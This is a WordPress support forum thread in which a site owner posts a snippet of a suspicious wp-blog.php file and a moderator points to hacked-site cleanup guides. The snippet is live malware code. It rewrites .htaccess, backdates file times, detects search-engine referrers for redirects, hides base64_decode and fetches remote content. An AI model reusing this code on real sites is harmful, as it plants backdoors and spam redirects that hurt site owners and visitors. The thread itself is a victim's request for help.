Title: Strange file Last modified: January 20, 2020 --- # Strange file * Resolved [mgc](https://wordpress.org/support/users/mgc/) * (@mgc) * [6 years, 4 months ago](https://wordpress.org/support/topic/strange-file/) * I noticed a strange file in my managed wordpress folder called wp-blog.php. In it, there’s some interesting code. Here’s a snippet: * ``` @ini_set('display_errors', '0'); error_reporting(0); $track = 'avt'; if (isset($_REQUEST['check'])) { $htaccess = '# BEGIN WordPress RewriteEngine On RewriteBase / RewriteRule ^(.+).html$ wp-blog.php?key=$1 RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] # END WordPress'; if (file_put_contents('.htaccess', $htaccess)) { touch('.htaccess', $actime); touch('wp-blog.php', $actime); echo 'ok'; } exit; } if (is_dir("wp-includes/Text/Diff/p")) { $dir = "wp-includes/Text/Diff/p"; } else $dir = "wp-content/uploads/wp"; $res = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST']; $redirect = 0; $fof = '404 not found'; function getRealIpAddr() { if (!empty($_SERVER['HTTP_CLIENT_IP'])) { $ip=$_SERVER['HTTP_CLIENT_IP']; } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip=$_SERVER['HTTP_X_FORWARDED_FOR']; } else { $ip=$_SERVER['REMOTE_ADDR']; } return $ip; } $ua = $_SERVER['HTTP_USER_AGENT']; $ip = getRealIpAddr(); $ref = $_SERVER['HTTP_REFERER']; if (preg_match("/google|bing|yandex|mail|aport|yahoo|baidu|aol|ask|duckduck|seznam|shenma|naver|haosou|sogou|daum|coccoc|qwant|dogpile|excite|wolfram|rambler/i", $ref)) $redirect = 1; $ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_ccd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $genpass = "xxx+xxx"; $tdpass = "xxxx"; if (ini_get('allow_url_fopen')) { function get_data_ya($mmm) { $data = file_get_contents($mmm); return $data; } } ``` * There’s more, but this part looks like it’s doing something suspicious. * I’m not a developer and only know a bit about coding, but is this malicious? How could it have been inserted? Also, can it in any way be tied to some 500- error related issues I’ve had recently? I appreciate your feedback. Thank you. - This topic was modified 6 years, 4 months ago by [Steven Stern (sterndata)](https://wordpress.org/support/users/sterndata/). Viewing 2 replies - 1 through 2 (of 2 total) * Moderator [Steven Stern (sterndata)](https://wordpress.org/support/users/sterndata/) * (@sterndata) * Volunteer Forum Moderator * [6 years, 4 months ago](https://wordpress.org/support/topic/strange-file/#post-12344580) * Get a fresh cup of coffee, take a deep breath and carefully follow [this guide](https://wordpress.org/support/article/faq-my-site-was-hacked/). When you’re done, you may want to implement some (if not all) of [the recommended security measures](https://wordpress.org/support/article/hardening-wordpress/). * If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple. * Thread Starter [mgc](https://wordpress.org/support/users/mgc/) * (@mgc) * [6 years, 4 months ago](https://wordpress.org/support/topic/strange-file/#post-12345661) * Hi Parrotlover and Steve, * Thank you for confirming this. I’ve installed some reputable security plugins, run some external scans, and spent a few hours now combing through all the folders looking for anything that looks even remotely suspicious. * I greatly appreciate your feedback and suggestions! * Cheers, Michael Viewing 2 replies - 1 through 2 (of 2 total) The topic ‘Strange file’ is closed to new replies. ## Tags * [suspicious file](https://wordpress.org/support/topic-tag/suspicious-file/) * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/) * 2 replies * 3 participants * Last reply from: [mgc](https://wordpress.org/support/users/mgc/) * Last activity: [6 years, 4 months ago](https://wordpress.org/support/topic/strange-file/#post-12345661) * Status: resolved ## Topics ### Topics with no replies ### Non-support topics ### Resolved topics ### Unresolved topics ### All topics